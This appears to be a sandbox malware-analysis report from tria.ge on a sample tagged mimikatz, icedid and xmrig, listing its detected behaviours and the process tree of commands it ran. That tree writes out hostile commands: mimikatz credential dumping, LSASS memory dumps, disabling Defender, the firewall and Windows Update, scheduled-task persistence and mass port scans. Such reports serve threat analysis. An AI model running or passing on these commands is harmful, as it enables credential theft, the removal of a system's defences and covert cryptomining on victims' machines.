Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    23/09/2024, 19:54

General

  • Target

    2024-09-23_5c1387c653058daa47938dd3be18ba4a_hacktools_icedid_mimikatz.exe

  • Size

    9.2MB

  • MD5

    5c1387c653058daa47938dd3be18ba4a

  • SHA1

    43eede8ba3040a21c737dd776b91f11bcc4fad8d

  • SHA256

    e99da1fde92e81f011b782811e58aa1067d53ce6c18222fa548d3937bd97100b

  • SHA512

    1416e64568fd0fe3cb3875d7e5e9eba80c183f4edba8dae16f49ba8514ac607a1acf723b3dd5ce1c1432a277e8e1407f42ab620c37dd830762ae5bccc098689c

  • SSDEEP

    196608:ylTPemknGzwHdOgEPHd9BYX/nivPlTXTYP:a3jz0E52/iv1

Malware Config

Signatures

  • Disables service(s) 3 TTPs
  • Mimikatz

    mimikatz is an open source tool to dump credentials on Windows.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Contacts a large (17466) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • OS Credential Dumping: LSASS Memory 1 TTPs

    Malicious access to Credentials History.

  • XMRig Miner payload 10 IoCs
  • mimikatz is an open source tool to dump credentials on Windows 5 IoCs
  • Drops file in Drivers directory 3 IoCs
  • Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
  • Modifies Windows Firewall 2 TTPs 2 IoCs
  • Executes dropped EXE 29 IoCs
  • Loads dropped DLL 12 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Network Share Discovery 1 TTPs

    Attempt to gather information on host network.

  • Creates a Windows Service
  • Drops file in System32 directory 18 IoCs
  • UPX packed file 36 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Program Files directory 3 IoCs
  • Drops file in Windows directory 60 IoCs
  • Launches sc.exe 4 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • NSIS installer 3 IoCs
  • Modifies data under HKEY_USERS 47 IoCs
  • Modifies registry class 14 IoCs
  • Runs net.exe
  • Runs ping.exe 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 15 IoCs
  • Suspicious behavior: RenamesItself 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 25 IoCs
  • Suspicious use of SetWindowsHookEx 10 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\System32\spoolsv.exe
    C:\Windows\System32\spoolsv.exe
    1⤵
      PID:2112
      • C:\Windows\TEMP\hyzeqbqqb\gztlyb.exe
        "C:\Windows\TEMP\hyzeqbqqb\gztlyb.exe"
        2⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:4856
    • C:\Users\Admin\AppData\Local\Temp\2024-09-23_5c1387c653058daa47938dd3be18ba4a_hacktools_icedid_mimikatz.exe
      "C:\Users\Admin\AppData\Local\Temp\2024-09-23_5c1387c653058daa47938dd3be18ba4a_hacktools_icedid_mimikatz.exe"
      1⤵
      • Drops file in Windows directory
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: RenamesItself
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:1500
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\ttzhywya\ubezybb.exe
        2⤵
        • System Location Discovery: System Language Discovery
        • System Network Configuration Discovery: Internet Connection Discovery
        • Suspicious use of WriteProcessMemory
        PID:3596
        • C:\Windows\SysWOW64\PING.EXE
          ping 127.0.0.1 -n 5
          3⤵
          • System Location Discovery: System Language Discovery
          • System Network Configuration Discovery: Internet Connection Discovery
          • Runs ping.exe
          PID:5076
        • C:\Windows\ttzhywya\ubezybb.exe
          C:\Windows\ttzhywya\ubezybb.exe
          3⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of SetWindowsHookEx
          PID:2296
    • C:\Windows\ttzhywya\ubezybb.exe
      C:\Windows\ttzhywya\ubezybb.exe
      1⤵
      • Suspicious use of NtCreateUserProcessOtherParentProcess
      • Drops file in Drivers directory
      • Event Triggered Execution: Image File Execution Options Injection
      • Executes dropped EXE
      • Drops file in System32 directory
      • Drops file in Windows directory
      • System Location Discovery: System Language Discovery
      • Modifies data under HKEY_USERS
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:1504
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
        2⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:3096
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
          3⤵
          • System Location Discovery: System Language Discovery
          PID:1208
        • C:\Windows\SysWOW64\cacls.exe
          cacls C:\Windows\system32\drivers\etc\hosts /T /D users
          3⤵
          • System Location Discovery: System Language Discovery
          PID:4820
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
          3⤵
            PID:2980
          • C:\Windows\SysWOW64\cacls.exe
            cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
            3⤵
            • System Location Discovery: System Language Discovery
            PID:2072
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /S /D /c" echo Y"
            3⤵
              PID:1928
            • C:\Windows\SysWOW64\cacls.exe
              cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
              3⤵
                PID:2220
            • C:\Windows\SysWOW64\netsh.exe
              netsh ipsec static del all
              2⤵
              • Event Triggered Execution: Netsh Helper DLL
              • System Location Discovery: System Language Discovery
              PID:676
            • C:\Windows\SysWOW64\netsh.exe
              netsh ipsec static add policy name=Bastards description=FuckingBastards
              2⤵
              • Event Triggered Execution: Netsh Helper DLL
              PID:4788
            • C:\Windows\SysWOW64\netsh.exe
              netsh ipsec static add filteraction name=BastardsList action=block
              2⤵
              • Event Triggered Execution: Netsh Helper DLL
              PID:2248
            • C:\Windows\SysWOW64\cmd.exe
              cmd /c C:\Windows\wezfuauac\sblagaaba\wpcap.exe /S
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:2796
              • C:\Windows\wezfuauac\sblagaaba\wpcap.exe
                C:\Windows\wezfuauac\sblagaaba\wpcap.exe /S
                3⤵
                • Drops file in Drivers directory
                • Executes dropped EXE
                • Loads dropped DLL
                • Drops file in System32 directory
                • Drops file in Program Files directory
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:780
                • C:\Windows\SysWOW64\net.exe
                  net stop "Boundary Meter"
                  4⤵
                  • Suspicious use of WriteProcessMemory
                  PID:5076
                  • C:\Windows\SysWOW64\net1.exe
                    C:\Windows\system32\net1 stop "Boundary Meter"
                    5⤵
                    • System Location Discovery: System Language Discovery
                    PID:2324
                • C:\Windows\SysWOW64\net.exe
                  net stop "TrueSight Meter"
                  4⤵
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of WriteProcessMemory
                  PID:3600
                  • C:\Windows\SysWOW64\net1.exe
                    C:\Windows\system32\net1 stop "TrueSight Meter"
                    5⤵
                      PID:2268
                  • C:\Windows\SysWOW64\net.exe
                    net stop npf
                    4⤵
                    • System Location Discovery: System Language Discovery
                    • Suspicious use of WriteProcessMemory
                    PID:3460
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 stop npf
                      5⤵
                      • System Location Discovery: System Language Discovery
                      PID:4988
                  • C:\Windows\SysWOW64\net.exe
                    net start npf
                    4⤵
                    • System Location Discovery: System Language Discovery
                    PID:5004
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 start npf
                      5⤵
                      • System Location Discovery: System Language Discovery
                      PID:4404
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c net start npf
                2⤵
                • System Location Discovery: System Language Discovery
                PID:368
                • C:\Windows\SysWOW64\net.exe
                  net start npf
                  3⤵
                  • System Location Discovery: System Language Discovery
                  PID:752
                  • C:\Windows\SysWOW64\net1.exe
                    C:\Windows\system32\net1 start npf
                    4⤵
                    • System Location Discovery: System Language Discovery
                    PID:3160
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c net start npf
                2⤵
                • System Location Discovery: System Language Discovery
                PID:3704
                • C:\Windows\SysWOW64\net.exe
                  net start npf
                  3⤵
                    PID:3220
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 start npf
                      4⤵
                      • System Location Discovery: System Language Discovery
                      PID:3192
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c C:\Windows\wezfuauac\sblagaaba\geypuubqa.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\wezfuauac\sblagaaba\Scant.txt
                  2⤵
                    PID:1588
                    • C:\Windows\wezfuauac\sblagaaba\geypuubqa.exe
                      C:\Windows\wezfuauac\sblagaaba\geypuubqa.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\wezfuauac\sblagaaba\Scant.txt
                      3⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • System Location Discovery: System Language Discovery
                      PID:2876
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c C:\Windows\wezfuauac\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\wezfuauac\Corporate\log.txt
                    2⤵
                    • Drops file in Windows directory
                    • System Location Discovery: System Language Discovery
                    PID:4464
                    • C:\Windows\wezfuauac\Corporate\vfshost.exe
                      C:\Windows\wezfuauac\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit
                      3⤵
                      • Executes dropped EXE
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2268
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "gtzhlygqz" /ru system /tr "cmd /c C:\Windows\ime\ubezybb.exe"
                    2⤵
                      PID:4624
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                        3⤵
                        • System Location Discovery: System Language Discovery
                        PID:2380
                      • C:\Windows\SysWOW64\schtasks.exe
                        schtasks /create /sc minute /mo 1 /tn "gtzhlygqz" /ru system /tr "cmd /c C:\Windows\ime\ubezybb.exe"
                        3⤵
                        • System Location Discovery: System Language Discovery
                        • Scheduled Task/Job: Scheduled Task
                        PID:4540
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "ywazsfbbl" /ru system /tr "cmd /c echo Y|cacls C:\Windows\ttzhywya\ubezybb.exe /p everyone:F"
                      2⤵
                      • System Location Discovery: System Language Discovery
                      PID:4708
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                        3⤵
                          PID:1648
                        • C:\Windows\SysWOW64\schtasks.exe
                          schtasks /create /sc minute /mo 1 /tn "ywazsfbbl" /ru system /tr "cmd /c echo Y|cacls C:\Windows\ttzhywya\ubezybb.exe /p everyone:F"
                          3⤵
                          • System Location Discovery: System Language Discovery
                          • Scheduled Task/Job: Scheduled Task
                          PID:1424
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "bebunzncg" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\hyzeqbqqb\gztlyb.exe /p everyone:F"
                        2⤵
                        • System Location Discovery: System Language Discovery
                        PID:5028
                        • C:\Windows\SysWOW64\cmd.exe
                          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                          3⤵
                          • System Location Discovery: System Language Discovery
                          PID:924
                        • C:\Windows\SysWOW64\schtasks.exe
                          schtasks /create /sc minute /mo 1 /tn "bebunzncg" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\hyzeqbqqb\gztlyb.exe /p everyone:F"
                          3⤵
                          • System Location Discovery: System Language Discovery
                          • Scheduled Task/Job: Scheduled Task
                          PID:636
                      • C:\Windows\SysWOW64\netsh.exe
                        netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP
                        2⤵
                        • Event Triggered Execution: Netsh Helper DLL
                        • System Location Discovery: System Language Discovery
                        PID:4476
                      • C:\Windows\SysWOW64\netsh.exe
                        netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP
                        2⤵
                        • Event Triggered Execution: Netsh Helper DLL
                        • System Location Discovery: System Language Discovery
                        PID:1608
                      • C:\Windows\SysWOW64\netsh.exe
                        netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                        2⤵
                        • Event Triggered Execution: Netsh Helper DLL
                        • System Location Discovery: System Language Discovery
                        PID:3328
                      • C:\Windows\SysWOW64\netsh.exe
                        netsh ipsec static set policy name=Bastards assign=y
                        2⤵
                        • Event Triggered Execution: Netsh Helper DLL
                        • System Location Discovery: System Language Discovery
                        PID:2716
                      • C:\Windows\SysWOW64\netsh.exe
                        netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP
                        2⤵
                        • Event Triggered Execution: Netsh Helper DLL
                        • System Location Discovery: System Language Discovery
                        PID:3532
                      • C:\Windows\SysWOW64\netsh.exe
                        netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP
                        2⤵
                        • Event Triggered Execution: Netsh Helper DLL
                        • System Location Discovery: System Language Discovery
                        PID:1532
                      • C:\Windows\SysWOW64\netsh.exe
                        netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                        2⤵
                        • Event Triggered Execution: Netsh Helper DLL
                        • System Location Discovery: System Language Discovery
                        PID:4388
                      • C:\Windows\SysWOW64\netsh.exe
                        netsh ipsec static set policy name=Bastards assign=y
                        2⤵
                        • Event Triggered Execution: Netsh Helper DLL
                        PID:2420
                      • C:\Windows\SysWOW64\netsh.exe
                        netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP
                        2⤵
                        • Event Triggered Execution: Netsh Helper DLL
                        • System Location Discovery: System Language Discovery
                        PID:3032
                      • C:\Windows\SysWOW64\netsh.exe
                        netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP
                        2⤵
                        • Event Triggered Execution: Netsh Helper DLL
                        • System Location Discovery: System Language Discovery
                        PID:4636
                      • C:\Windows\SysWOW64\netsh.exe
                        netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                        2⤵
                        • Event Triggered Execution: Netsh Helper DLL
                        • System Location Discovery: System Language Discovery
                        PID:3296
                      • C:\Windows\SysWOW64\netsh.exe
                        netsh ipsec static set policy name=Bastards assign=y
                        2⤵
                        • Event Triggered Execution: Netsh Helper DLL
                        PID:1672
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd /c net stop SharedAccess
                        2⤵
                        • System Location Discovery: System Language Discovery
                        PID:3272
                        • C:\Windows\SysWOW64\net.exe
                          net stop SharedAccess
                          3⤵
                            PID:4216
                            • C:\Windows\SysWOW64\net1.exe
                              C:\Windows\system32\net1 stop SharedAccess
                              4⤵
                              • System Location Discovery: System Language Discovery
                              PID:4540
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd /c netsh firewall set opmode mode=disable
                          2⤵
                          • System Location Discovery: System Language Discovery
                          PID:5040
                          • C:\Windows\SysWOW64\netsh.exe
                            netsh firewall set opmode mode=disable
                            3⤵
                            • Modifies Windows Firewall
                            • Event Triggered Execution: Netsh Helper DLL
                            PID:4360
                        • C:\Windows\TEMP\wezfuauac\qletbebsb.exe
                          C:\Windows\TEMP\wezfuauac\qletbebsb.exe -accepteula -mp 792 C:\Windows\TEMP\wezfuauac\792.dmp
                          2⤵
                          • Executes dropped EXE
                          • Modifies data under HKEY_USERS
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1160
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd /c netsh Advfirewall set allprofiles state off
                          2⤵
                          • System Location Discovery: System Language Discovery
                          PID:3900
                          • C:\Windows\SysWOW64\netsh.exe
                            netsh Advfirewall set allprofiles state off
                            3⤵
                            • Modifies Windows Firewall
                            • Event Triggered Execution: Netsh Helper DLL
                            • System Location Discovery: System Language Discovery
                            PID:64
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd /c net stop MpsSvc
                          2⤵
                          • System Location Discovery: System Language Discovery
                          PID:4708
                          • C:\Windows\SysWOW64\net.exe
                            net stop MpsSvc
                            3⤵
                            • System Location Discovery: System Language Discovery
                            PID:1116
                            • C:\Windows\SysWOW64\net1.exe
                              C:\Windows\system32\net1 stop MpsSvc
                              4⤵
                                PID:1560
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /c net stop WinDefend
                            2⤵
                              PID:516
                              • C:\Windows\SysWOW64\net.exe
                                net stop WinDefend
                                3⤵
                                • System Location Discovery: System Language Discovery
                                PID:1328
                                • C:\Windows\SysWOW64\net1.exe
                                  C:\Windows\system32\net1 stop WinDefend
                                  4⤵
                                    PID:4832
                              • C:\Windows\SysWOW64\cmd.exe
                                cmd /c net stop wuauserv
                                2⤵
                                  PID:2976
                                  • C:\Windows\SysWOW64\net.exe
                                    net stop wuauserv
                                    3⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:5012
                                    • C:\Windows\SysWOW64\net1.exe
                                      C:\Windows\system32\net1 stop wuauserv
                                      4⤵
                                        PID:404
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd /c sc config MpsSvc start= disabled
                                    2⤵
                                      PID:4532
                                      • C:\Windows\SysWOW64\sc.exe
                                        sc config MpsSvc start= disabled
                                        3⤵
                                        • Launches sc.exe
                                        PID:780
                                    • C:\Windows\SysWOW64\cmd.exe
                                      cmd /c sc config SharedAccess start= disabled
                                      2⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:2296
                                      • C:\Windows\SysWOW64\sc.exe
                                        sc config SharedAccess start= disabled
                                        3⤵
                                        • Launches sc.exe
                                        • System Location Discovery: System Language Discovery
                                        PID:4792
                                    • C:\Windows\SysWOW64\cmd.exe
                                      cmd /c sc config WinDefend start= disabled
                                      2⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:3596
                                      • C:\Windows\SysWOW64\sc.exe
                                        sc config WinDefend start= disabled
                                        3⤵
                                        • Launches sc.exe
                                        • System Location Discovery: System Language Discovery
                                        PID:3532
                                    • C:\Windows\SysWOW64\cmd.exe
                                      cmd /c sc config wuauserv start= disabled
                                      2⤵
                                        PID:3832
                                        • C:\Windows\SysWOW64\sc.exe
                                          sc config wuauserv start= disabled
                                          3⤵
                                          • Launches sc.exe
                                          • System Location Discovery: System Language Discovery
                                          PID:4392
                                      • C:\Windows\TEMP\xohudmc.exe
                                        C:\Windows\TEMP\xohudmc.exe
                                        2⤵
                                        • Executes dropped EXE
                                        • Drops file in System32 directory
                                        • System Location Discovery: System Language Discovery
                                        • Suspicious use of SetWindowsHookEx
                                        PID:1528
                                      • C:\Windows\TEMP\wezfuauac\qletbebsb.exe
                                        C:\Windows\TEMP\wezfuauac\qletbebsb.exe -accepteula -mp 388 C:\Windows\TEMP\wezfuauac\388.dmp
                                        2⤵
                                        • Executes dropped EXE
                                        • Modifies data under HKEY_USERS
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:4588
                                      • C:\Windows\TEMP\wezfuauac\qletbebsb.exe
                                        C:\Windows\TEMP\wezfuauac\qletbebsb.exe -accepteula -mp 2112 C:\Windows\TEMP\wezfuauac\2112.dmp
                                        2⤵
                                        • Executes dropped EXE
                                        • Modifies data under HKEY_USERS
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:3932
                                      • C:\Windows\TEMP\wezfuauac\qletbebsb.exe
                                        C:\Windows\TEMP\wezfuauac\qletbebsb.exe -accepteula -mp 2668 C:\Windows\TEMP\wezfuauac\2668.dmp
                                        2⤵
                                        • Executes dropped EXE
                                        • Modifies data under HKEY_USERS
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:4752
                                      • C:\Windows\TEMP\wezfuauac\qletbebsb.exe
                                        C:\Windows\TEMP\wezfuauac\qletbebsb.exe -accepteula -mp 2816 C:\Windows\TEMP\wezfuauac\2816.dmp
                                        2⤵
                                        • Executes dropped EXE
                                        • Modifies data under HKEY_USERS
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:4352
                                      • C:\Windows\TEMP\wezfuauac\qletbebsb.exe
                                        C:\Windows\TEMP\wezfuauac\qletbebsb.exe -accepteula -mp 2300 C:\Windows\TEMP\wezfuauac\2300.dmp
                                        2⤵
                                        • Executes dropped EXE
                                        • Modifies data under HKEY_USERS
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:4784
                                      • C:\Windows\TEMP\wezfuauac\qletbebsb.exe
                                        C:\Windows\TEMP\wezfuauac\qletbebsb.exe -accepteula -mp 3144 C:\Windows\TEMP\wezfuauac\3144.dmp
                                        2⤵
                                        • Executes dropped EXE
                                        • Modifies data under HKEY_USERS
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:4160
                                      • C:\Windows\TEMP\wezfuauac\qletbebsb.exe
                                        C:\Windows\TEMP\wezfuauac\qletbebsb.exe -accepteula -mp 3868 C:\Windows\TEMP\wezfuauac\3868.dmp
                                        2⤵
                                        • Executes dropped EXE
                                        • Modifies data under HKEY_USERS
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:1560
                                      • C:\Windows\TEMP\wezfuauac\qletbebsb.exe
                                        C:\Windows\TEMP\wezfuauac\qletbebsb.exe -accepteula -mp 4016 C:\Windows\TEMP\wezfuauac\4016.dmp
                                        2⤵
                                        • Executes dropped EXE
                                        • Modifies data under HKEY_USERS
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:4404
                                      • C:\Windows\TEMP\wezfuauac\qletbebsb.exe
                                        C:\Windows\TEMP\wezfuauac\qletbebsb.exe -accepteula -mp 4080 C:\Windows\TEMP\wezfuauac\4080.dmp
                                        2⤵
                                        • Executes dropped EXE
                                        • Modifies data under HKEY_USERS
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:1508
                                      • C:\Windows\TEMP\wezfuauac\qletbebsb.exe
                                        C:\Windows\TEMP\wezfuauac\qletbebsb.exe -accepteula -mp 2648 C:\Windows\TEMP\wezfuauac\2648.dmp
                                        2⤵
                                        • Executes dropped EXE
                                        • Modifies data under HKEY_USERS
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:676
                                      • C:\Windows\TEMP\wezfuauac\qletbebsb.exe
                                        C:\Windows\TEMP\wezfuauac\qletbebsb.exe -accepteula -mp 4568 C:\Windows\TEMP\wezfuauac\4568.dmp
                                        2⤵
                                        • Executes dropped EXE
                                        • Modifies data under HKEY_USERS
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:2720
                                      • C:\Windows\TEMP\wezfuauac\qletbebsb.exe
                                        C:\Windows\TEMP\wezfuauac\qletbebsb.exe -accepteula -mp 4424 C:\Windows\TEMP\wezfuauac\4424.dmp
                                        2⤵
                                        • Executes dropped EXE
                                        • Modifies data under HKEY_USERS
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:4896
                                      • C:\Windows\TEMP\wezfuauac\qletbebsb.exe
                                        C:\Windows\TEMP\wezfuauac\qletbebsb.exe -accepteula -mp 3012 C:\Windows\TEMP\wezfuauac\3012.dmp
                                        2⤵
                                        • Executes dropped EXE
                                        • Modifies data under HKEY_USERS
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:2980
                                      • C:\Windows\TEMP\wezfuauac\qletbebsb.exe
                                        C:\Windows\TEMP\wezfuauac\qletbebsb.exe -accepteula -mp 4068 C:\Windows\TEMP\wezfuauac\4068.dmp
                                        2⤵
                                        • Executes dropped EXE
                                        • Modifies data under HKEY_USERS
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:4356
                                      • C:\Windows\TEMP\wezfuauac\qletbebsb.exe
                                        C:\Windows\TEMP\wezfuauac\qletbebsb.exe -accepteula -mp 2620 C:\Windows\TEMP\wezfuauac\2620.dmp
                                        2⤵
                                        • Executes dropped EXE
                                        • Modifies data under HKEY_USERS
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:4708
                                      • C:\Windows\TEMP\wezfuauac\qletbebsb.exe
                                        C:\Windows\TEMP\wezfuauac\qletbebsb.exe -accepteula -mp 1576 C:\Windows\TEMP\wezfuauac\1576.dmp
                                        2⤵
                                        • Executes dropped EXE
                                        • Modifies data under HKEY_USERS
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:3308
                                      • C:\Windows\TEMP\wezfuauac\qletbebsb.exe
                                        C:\Windows\TEMP\wezfuauac\qletbebsb.exe -accepteula -mp 4324 C:\Windows\TEMP\wezfuauac\4324.dmp
                                        2⤵
                                        • Executes dropped EXE
                                        • Modifies data under HKEY_USERS
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:916
                                      • C:\Windows\TEMP\wezfuauac\qletbebsb.exe
                                        C:\Windows\TEMP\wezfuauac\qletbebsb.exe -accepteula -mp 4320 C:\Windows\TEMP\wezfuauac\4320.dmp
                                        2⤵
                                        • Executes dropped EXE
                                        • Modifies data under HKEY_USERS
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:2628
                                      • C:\Windows\SysWOW64\cmd.exe
                                        cmd.exe /c C:\Windows\wezfuauac\sblagaaba\scan.bat
                                        2⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:3648
                                        • C:\Windows\wezfuauac\sblagaaba\yqhqaznuh.exe
                                          yqhqaznuh.exe TCP 194.110.0.1 194.110.255.255 7001 512 /save
                                          3⤵
                                          • Executes dropped EXE
                                          • Drops file in Windows directory
                                          • System Location Discovery: System Language Discovery
                                          PID:676
                                      • C:\Windows\SysWOW64\cmd.exe
                                        cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
                                        2⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:4540
                                        • C:\Windows\SysWOW64\cmd.exe
                                          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                          3⤵
                                            PID:1672
                                          • C:\Windows\SysWOW64\cacls.exe
                                            cacls C:\Windows\system32\drivers\etc\hosts /T /D users
                                            3⤵
                                              PID:5004
                                            • C:\Windows\SysWOW64\cmd.exe
                                              C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                              3⤵
                                              • System Location Discovery: System Language Discovery
                                              PID:5028
                                            • C:\Windows\SysWOW64\cacls.exe
                                              cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
                                              3⤵
                                              • System Location Discovery: System Language Discovery
                                              PID:5976
                                            • C:\Windows\SysWOW64\cmd.exe
                                              C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                              3⤵
                                              • System Location Discovery: System Language Discovery
                                              PID:5400
                                            • C:\Windows\SysWOW64\cacls.exe
                                              cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
                                              3⤵
                                              • System Location Discovery: System Language Discovery
                                              PID:2716
                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=1288,i,7447299413640964517,4240724842020506306,262144 --variations-seed-version --mojo-platform-channel-handle=4408 /prefetch:8
                                          1⤵
                                            PID:3328
                                          • C:\Windows\SysWOW64\ogmqgi.exe
                                            C:\Windows\SysWOW64\ogmqgi.exe
                                            1⤵
                                            • Executes dropped EXE
                                            • System Location Discovery: System Language Discovery
                                            • Suspicious use of SetWindowsHookEx
                                            PID:1244
                                          • C:\Windows\system32\cmd.EXE
                                            C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\ttzhywya\ubezybb.exe /p everyone:F
                                            1⤵
                                              PID:4392
                                              • C:\Windows\system32\cmd.exe
